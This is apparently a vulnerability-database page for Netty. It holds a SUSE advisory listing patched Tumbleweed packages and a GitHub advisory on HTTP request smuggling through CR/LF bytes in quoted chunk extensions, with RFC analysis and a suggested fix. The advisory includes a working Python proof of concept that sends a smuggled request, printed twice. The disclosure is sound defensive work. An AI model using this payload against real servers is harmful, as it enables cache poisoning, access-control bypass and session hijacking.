"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-33870"
},
{
"cve": "CVE-2026-33871",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-33871"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, a remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of `CONTINUATION` frames. The server\u0027s lack of a limit on the number of `CONTINUATION` frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows an user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive. Versions 4.1.132.Final and 4.2.10.Final fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-33871",
"url": "https://www.suse.com/security/cve/CVE-2026-33871"
},
{
"category": "external",
"summary": "SUSE Bug 1261043 for CVE-2026-33871",
"url": "https://bugzilla.suse.com/1261043"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-33871"
}
]
}
GHSA-PWQR-WMGM-9RR8
Vulnerability from github – Published: 2026-03-26 18:48 – Updated: 2026-03-27 21:49
VLAI?
Summary
Netty: HTTP Request Smuggling via Chunked Extension Quoted-String Parsing
Details
Summary
Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.
Background
This vulnerability is a new variant discovered during research into the "Funky Chunks" HTTP request smuggling techniques:
The original research tested various chunk extension parsing differentials but did not cover quoted-string handling within extension values.
Technical Details
RFC 9110 Section 7.1.1 defines chunked transfer encoding:
chunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF
chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] )
chunk-ext-val = token / quoted-string
RFC 9110 Section 5.6.4 defines quoted-string:
quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE
Critically, the allowed character ranges within a quoted-string are:
qdtext = HTAB / SP / %x21 / %x23-5B / %x5D-7E / obs-text
quoted-pair = "\" ( HTAB / SP / VCHAR / obs-text )
CR (%x0D) and LF (%x0A) bytes fall outside all of these ranges and are therefore not permitted inside chunk extensions—whether quoted or unquoted. A strictly compliant parser should reject any request containing CR or LF bytes before the actual line terminator within a chunk extension with a 400 Bad Request response (as Squid does, for example).
Vulnerability
Netty terminates chunk header parsing at \r\n inside quoted strings instead of rejecting the request as malformed. This creates a parsing differential between Netty and RFC-compliant parsers, which can be exploited for request smuggling.
Expected behavior (RFC-compliant): A request containing CR/LF bytes within a chunk extension value should be rejected outright as invalid.
Actual behavior (Netty):
Chunk: 1;a="value
^^^^^ parsing terminates here at \r\n (INCORRECT)
Body: here"... is treated as body or the beginning of a subsequent request
The root cause is that Netty does not validate that CR/LF bytes are forbidden inside chunk extensions before the terminating CRLF. Rather than attempting to parse through quoted strings, the appropriate fix is to reject such requests entirely.
Proof of Concept
#!/usr/bin/env python3
import socket
payload = (
b"POST / HTTP/1.1\r\n"
b"Host: localhost\r\n"
b"Transfer-Encoding: chunked\r\n"
b"\r\n"
b'1;a="\r\n'
b"X\r\n"
b"0\r\n"
b"\r\n"
b"GET /smuggled HTTP/1.1\r\n"
b"Host: localhost\r\n"
b"Content-Length: 11\r\n"
b"\r\n"
b'"\r\n'
b"Y\r\n"
b"0\r\n"
b"\r\n"
)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)
response = b""
while True:
try:
chunk = sock.recv(4096)
if not chunk:
break
response += chunk
except socket.timeout:
break
sock.close()
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))
Result: The server returns two HTTP responses from a single TCP connection, confirming request smuggling.
Parsing Breakdown
| Parser | Request 1 | Request 2 |
|---|---|---|
| Netty (vulnerable) | POST / body="X" | GET /smuggled (SMUGGLED) |
| RFC-compliant parser | 400 Bad Request | (none — malformed request rejected) |
Impact
- Request Smuggling: An attacker can inject arbitrary HTTP requests into a connection.
- Cache Poisoning: Smuggled responses may poison shared caches.
- Access Control Bypass: Smuggled requests can circumvent frontend security controls.
- Session Hijacking: Smuggled requests may intercept responses intended for other users.
Reproduction
- Start the minimal proof-of-concept environment using the provided Docker configuration.
- Execute the proof-of-concept script included in the attached archive.
Suggested Fix
The parser should reject requests containing CR or LF bytes within chunk extensions rather than attempting to interpret them:
1. Read chunk-size.
2. If ';' is encountered, begin parsing extensions:
a. For each byte before the terminating CRLF:
- If CR (%x0D) or LF (%x0A) is encountered outside the
final terminating CRLF, reject the request with 400 Bad Request.
b. If the extension value begins with DQUOTE, validate that all
enclosed bytes conform to the qdtext / quoted-pair grammar.
3. Only treat CRLF as the chunk header terminator when it appears
outside any quoted-string context and contains no preceding
illegal bytes.
Acknowledgments
Credit to Ben Kallus for clarifying the RFC interpretation during discussion on the HAProxy mailing list.
Resources
Attachments
Severity ?
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.132.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http"
},
"ranges": [
{
"events": [
{
"introduced": "4.2.0.Alpha1"
},
{
"fixed": "4.2.10.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33870"
],
"database_specific": {
"cwe_ids": [
"CWE-444"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T18:48:55Z",
"nvd_published_at": "2026-03-27T20:16:34Z",
"severity": "HIGH"
},
"details": "## Summary\n\nNetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.\n\n## Background\n\nThis vulnerability is a new variant discovered during research into the \"Funky Chunks\" HTTP request smuggling techniques:\n\n- \u003chttps://w4ke.info/2025/06/18/funky-chunks.html\u003e\n- \u003chttps://w4ke.info/2025/10/29/funky-chunks-2.html\u003e\n\nThe original research tested various chunk extension parsing differentials but did not cover quoted-string handling within extension values.\n\n## Technical Details\n\n**RFC 9110 Section 7.1.1** defines chunked transfer encoding:\n\n```\nchunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF\nchunk-ext = *( BWS \";\" BWS chunk-ext-name [ BWS \"=\" BWS chunk-ext-val ] )\nchunk-ext-val = token / quoted-string\n```\n\n**RFC 9110 Section 5.6.4** defines quoted-string:\n\n```\nquoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE\n```\n\nCritically, the allowed character ranges within a quoted-string are:\n\n```\nqdtext = HTAB / SP / %x21 / %x23-5B / %x5D-7E / obs-text\nquoted-pair = \"\\\" ( HTAB / SP / VCHAR / obs-text )\n```\n\nCR (`%x0D`) and LF (`%x0A`) bytes fall outside all of these ranges and are therefore **not permitted** inside chunk extensions\u2014whether quoted or unquoted. A strictly compliant parser should reject any request containing CR or LF bytes before the actual line terminator within a chunk extension with a `400 Bad Request` response (as Squid does, for example).\n\n## Vulnerability\n\nNetty terminates chunk header parsing at `\\r\\n` inside quoted strings instead of rejecting the request as malformed. This creates a parsing differential between Netty and RFC-compliant parsers, which can be exploited for request smuggling.\n\n**Expected behavior (RFC-compliant):**\nA request containing CR/LF bytes within a chunk extension value should be rejected outright as invalid.\n\n**Actual behavior (Netty):**\n\n```\nChunk: 1;a=\"value\n ^^^^^ parsing terminates here at \\r\\n (INCORRECT)\nBody: here\"... is treated as body or the beginning of a subsequent request\n```\n\nThe root cause is that Netty does not validate that CR/LF bytes are forbidden inside chunk extensions before the terminating CRLF. Rather than attempting to parse through quoted strings, the appropriate fix is to reject such requests entirely.\n\n## Proof of Concept\n\n```python\n#!/usr/bin/env python3\nimport socket\n\npayload = (\n b\"POST / HTTP/1.1\\r\\n\"\n b\"Host: localhost\\r\\n\"\n b\"Transfer-Encoding: chunked\\r\\n\"\n b\"\\r\\n\"\n b\u00271;a=\"\\r\\n\u0027\n b\"X\\r\\n\"\n b\"0\\r\\n\"\n b\"\\r\\n\"\n b\"GET /smuggled HTTP/1.1\\r\\n\"\n b\"Host: localhost\\r\\n\"\n b\"Content-Length: 11\\r\\n\"\n b\"\\r\\n\"\n b\u0027\"\\r\\n\u0027\n b\"Y\\r\\n\"\n b\"0\\r\\n\"\n b\"\\r\\n\"\n)\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.settimeout(3)\nsock.connect((\"127.0.0.1\", 8080))\nsock.sendall(payload)\n\nresponse = b\"\"\nwhile True:\n try:\n chunk = sock.recv(4096)\n if not chunk:\n break\n response += chunk\n except socket.timeout:\n break\n\nsock.close()\nprint(f\"Responses: {response.count(b\u0027HTTP/\u0027)}\")\nprint(response.decode(errors=\"replace\"))\n```\n\n**Result:** The server returns two HTTP responses from a single TCP connection, confirming request smuggling.\n\n### Parsing Breakdown\n\n| Parser | Request 1 | Request 2 |\n|-----------------------|-------------------|------------------------------------|\n| Netty (vulnerable) | POST / body=\"X\" | GET /smuggled (SMUGGLED) |\n| RFC-compliant parser | 400 Bad Request | (none \u2014 malformed request rejected)|\n\n## Impact\n\n- **Request Smuggling**: An attacker can inject arbitrary HTTP requests into a connection.\n- **Cache Poisoning**: Smuggled responses may poison shared caches.\n- **Access Control Bypass**: Smuggled requests can circumvent frontend security controls.\n- **Session Hijacking**: Smuggled requests may intercept responses intended for other users.\n\n## Reproduction\n\n1. Start the minimal proof-of-concept environment using the provided Docker configuration.\n2. Execute the proof-of-concept script included in the attached archive.\n\n## Suggested Fix\n\nThe parser should reject requests containing CR or LF bytes within chunk extensions rather than attempting to interpret them:\n\n```\n1. Read chunk-size.\n2. If \u0027;\u0027 is encountered, begin parsing extensions:\n a. For each byte before the terminating CRLF:\n - If CR (%x0D) or LF (%x0A) is encountered outside the\n final terminating CRLF, reject the request with 400 Bad Request.\n b. If the extension value begins with DQUOTE, validate that all\n enclosed bytes conform to the qdtext / quoted-pair grammar.\n3. Only treat CRLF as the chunk header terminator when it appears\n outside any quoted-string context and contains no preceding\n illegal bytes.\n```\n\n## Acknowledgments\n\nCredit to Ben Kallus for clarifying the RFC interpretation during discussion on the HAProxy mailing list.\n\n## Resources\n\n- [RFC 9110: HTTP Semantics (Sections 5.6.4, 7.1.1)](https://www.rfc-editor.org/rfc/rfc9110)\n- [Funky Chunks Research](https://w4ke.info/2025/06/18/funky-chunks.html)\n- [Funky Chunks 2 Research](https://w4ke.info/2025/10/29/funky-chunks-2.html)\n\n## Attachments\n\n\n\n[java_netty.zip](https://github.com/user-attachments/files/24697955/java_netty.zip)",
"id": "GHSA-pwqr-wmgm-9rr8",
"modified": "2026-03-27T21:49:43Z",
"published": "2026-03-26T18:48:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33870"
},
{
"type": "PACKAGE",
"url": "https://github.com/netty/netty"
},
{
"type": "WEB",
"url": "https://w4ke.info/2025/06/18/funky-chunks.html"
},
{
"type": "WEB",
"url": "https://w4ke.info/2025/10/29/funky-chunks-2.html"
},
{
"type": "WEB",
"url": "https://www.rfc-editor.org/rfc/rfc9110"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Netty: HTTP Request Smuggling via Chunked Extension Quoted-String Parsing"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…